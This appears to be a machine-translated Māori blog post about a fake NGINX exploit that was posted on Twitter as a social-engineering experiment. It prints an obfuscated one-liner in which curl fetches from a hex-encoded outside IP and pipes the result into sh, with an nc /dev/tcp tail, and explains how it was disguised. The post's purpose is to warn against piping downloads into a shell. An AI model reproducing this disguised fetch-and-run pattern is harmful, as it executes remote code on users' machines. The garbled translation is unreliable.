Tuhipoka. whakamaori.: tuhi taketake, i whakaputaina i te Hune 1, i whakatau ki te whakahaere i tetahi whakamatautau i waenga i te hunga e hiahia ana ki te haumaru korero. Ki te mahi i tenei, i whakaritea e ia he mahi rūpahu mo te whakaraeraetanga kore korero i roto i te tūmau tukutuku me te whakairi ki runga i tana Twitter. Ko ana whakaaro - kia kitea tonutia e nga tohunga ka kite i te tinihanga i roto i te waehere - ehara i te mea i tutuki ... I nui ake i nga tumanakohanga katoa, a, i te huarahi rereke: i whiwhi tautoko nui te tweet mai i te tini o nga tangata kaore i tutuki. tirohia ona ihirangi.
TL; DR: Kaua e whakamahi i te pipelining konae i roto i te sh, i te bash ranei i raro i nga ahuatanga katoa. He huarahi pai tenei ki te ngaro te mana o to rorohiko.
E hiahia ana ahau ki te whakapuaki ki a koe i tetahi korero poto mo te mahi PoC pakiwaitara i hangaia i te 31 o Mei. I puta wawe ia ki te whakautu i nga korero mai i , mema (ZDI), ko nga korero e pa ana ki te whakaraeraetanga i roto i te NGINX e arahi ana ki te RCE (whakamahinga waehere mamao) ka puta tata. I te mea e kaha ana a NGINX ki nga paetukutuku maha, me he poma nga korero. Engari na te roa o te mahi "whakapuaki kawenga", kaore i mohiotia nga korero mo nga mea i tupu - he tikanga ZDI tenei.
mo te whakaraeraetanga whakaraerae i NGINX
Ka mutu taku mahi i tetahi tikanga whakapouri hou i roto i te curl, i kii ahau i te tweet taketake me te "patai i tetahi PoC mahi" kei roto i te rarangi waehere kotahi e kii ana e whakamahi ana i te whakaraeraetanga kua kitea. Ko te tikanga, he tino poauau tenei. I whakaaro ahau ka kitea tonutia ahau, me te pai ka whiwhi au i nga retweets (aue).
me te mahi tinihanga
Heoi, kare e taea e au te whakaaro he aha te mea i muri mai. Kua piki te rongonui o taku tweet. He mea whakamiharo, i tenei wa (15:00 i te wa o Moscow i te Pipiri 1) he torutoru nga tangata kua mohio he korero teka tenei. He maha nga tangata ka whakahoki ano i a ia me te kore e tirotirohia (kaore i te whakamihi i nga whakairoiro ASCII ataahua e whakaputa ana).
Titiro noa te ataahua!
Ahakoa he rawe katoa enei koropiko me nga tae, e marama ana me whakahaere te tangata i te waehere ki runga i a raatau miihini kia kitea ai. Waimarie, he rite tonu te mahi a nga kaitirotiro, me te mea kare au i tino hiahia ki te uru atu ki te raruraru ture, ko te waehere i tanumia ki taku papaanga kei te hanga waea paoro me te kore e ngana ki te whakauru, ki te mahi i etahi atu waehere.
He rereke iti: , , ahau me era atu taane o te kapa Kua takaro matou ki nga huarahi rereke ki te whakapouri i nga whakahau korukoru mo tetahi wa i tenei wa na te mea he hauhautanga... a he kuia matou. He maha nga tikanga hou i kitea e netspooky me dnz he tino pai ki ahau. I uru atu ahau ki te ngahau me te ngana ki te taapiri i nga huringa IP ira-ira ki te putea tinihanga. Ka puta mai ka taea hoki te huri IP ki te whakatakotoranga hexadecimal. I tua atu, ko te curl me te nuinga atu o nga taputapu NIX e kai ana i nga IP hexadecimal! Na he mea noa ki te hanga i tetahi rarangi whakahau whakapumau me te ahua haumaru. I te mutunga ka whakatau ahau ki tenei:
curl -gsS https://127.0.0.1-OR-VICTIM-SERVER:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhostKo te hangahanga Hapori-hiko (S.E.E.) he nui ake i te hītinihanga noa
Ko te haumaru me te waiatanga tetahi waahanga nui o tenei whakamatautau. Ki taku whakaaro ko ratou te take i angitu ai ia. Ko te rarangi whakahau e whakaatu ana i te haumarutanga ma te korero ki "127.0.0.1" (te localhost rongonui). Ka kiia ko Localhost he haumaru me nga raraunga kei runga e kore e waiho i to rorohiko.
Ko te mohiotanga te waahanga tuarua o te S.E.E. o te whakamatautau. I te mea ko te nuinga o te hunga whakarongo ko nga tangata e mohio ana ki nga kaupapa o te haumaru rorohiko, he mea nui ki te hanga waehere kia pai ai te ahua o etahi waahanga o taua mea (he haumaru hoki). Ko te tango i nga huānga o nga ariā whakamahi tawhito me te whakakotahi ki tetahi huarahi rereke kua kitea he tino angitu.
Kei raro iho nei te whakamaarama taipitopito o te raina kotahi. Ko nga mea katoa kei runga i tenei rarangi ka mau ahua whakapaipai, me te mea kaore he mea e hiahiatia ana mo tana mahi tuturu.
He aha nga waahanga e tino hiahiatia ana? Tenei -gsS, -O 0x0238f06a, |sh me te tūmau tukutuku ake. Karekau he tohutohu kino i roto i te tūmau tukutuku, engari i tukuna noa nga whakairoiro ASCII ma te whakamahi i nga whakahau echo i roto i te tuhinga kei roto index.html. I te wa i uru te kaiwhakamahi ki tetahi raina me |sh i waenganui, index.html ka utaina, ka mahia. Waimarie, karekau he whakaaro kino a nga kaitiaki o te tūmau tukutuku.
-
../../../%00— e tohu ana i te haere ki tua atu o te whaiaronga; -
ngx_stream_module.so— ara ki te kōwae NGINX matapōkere; -
/bin/sh%00<'protocol:TCP'- e kiia ana kei te whakarewahia e matou/bin/shi runga i te miihini whaainga ka tukuna ano te putanga ki te hongere TCP; -
-O 0x0238f06a#PLToffset- whakauru ngaro, taapiri#PLToffset, kia rite te ahua o te putunga mahara kei roto i te PLT; -
|sh;- tetahi atu wahanga nui. I hiahia matou ki te huri i te putanga ki te sh/bash kia mahia ai te waehere ka puta mai i te tūmau tukutuku whakaeke kei te0x0238f06a(2.56.240.x); -
nc /dev/tcp/localhost- he hangarua e korero ana a netcat/dev/tcp/localhostkia ora ano nga mea katoa. Ko te mea pono, kaore he mahi me te whakauru ki te raina mo te ataahua.
Ka mutu tenei i te wetewete o te tuhi raina-kotahi me te matapaki mo nga ahuatanga o te "haapori-hikohiko" (hītinihanga uaua).
Whirihoranga Tūmau Tukutuku me nga Whakataunga
I te mea ko te nuinga o aku kaiohauru he infosec/hackers, i whakatau ahau kia kaha ake te aukati i te paetukutuku tukutuku ki nga korero o te "paanga" ki a raatau, kia whai mahi nga taangata (a he mea ngahau ki te whakaturia). E kore ahau e whakararangi i nga mahanga katoa i konei mai i te mea kei te haere tonu te whakamatautau, engari koinei etahi o nga mahi a te kaimau:
- Ka aro turuki i nga ngana tohatoha ki etahi whatunga hapori me te whakakapi i nga momo karakōnui arokite hei akiaki i te kaiwhakamahi ki te paato i te hono.
- Ka anga a Chrome/Mozilla/Safari/etc ki te ataata whakatairanga Thugcrowd kaua e whakaatu i te tuhinga anga.
- Maataki mo nga tohu OBVIOUS o te pokanoa/ko te mahi hacking, katahi ka timata te tuku tono ki nga tūmau NSA (ha!).
- Ka whakauruhia he Torotiana, me te kete BIOS, i runga i nga rorohiko katoa e toro atu ana nga kaiwhakamahi ki te kaihautu mai i te kaitirotiro auau (he kata noa!).
He wahi iti o te antimers
I tenei keehi, ko taku whainga anake ko te mohio ki etahi o nga ahuatanga o Apache - ina koa, nga ture pai mo te whakatika i nga tono - a ka whakaaro ahau: he aha?
NGINX Whakamahi (Tuturu!)
Ohauru ki i runga i Twitter me te whai i nga mahi nui a ZDI ki te whakatika i nga whakaraeraetanga tino pono me te whakamahi i nga whai waahi ki NGINX. Ko a raatau mahi i tino miharo ahau i nga wa katoa, ka mihi ahau ki a Alice mo tana manawanui ki nga korero me nga whakamohiotanga i puta mai i taku tweet poauau. Waimarie, he pai ano te mahi: i awhina i te whakanui ake i nga whakaraeraetanga o te NGINX, tae atu ki nga raru i puta mai i te mahi kino o te curl.
Source: will.com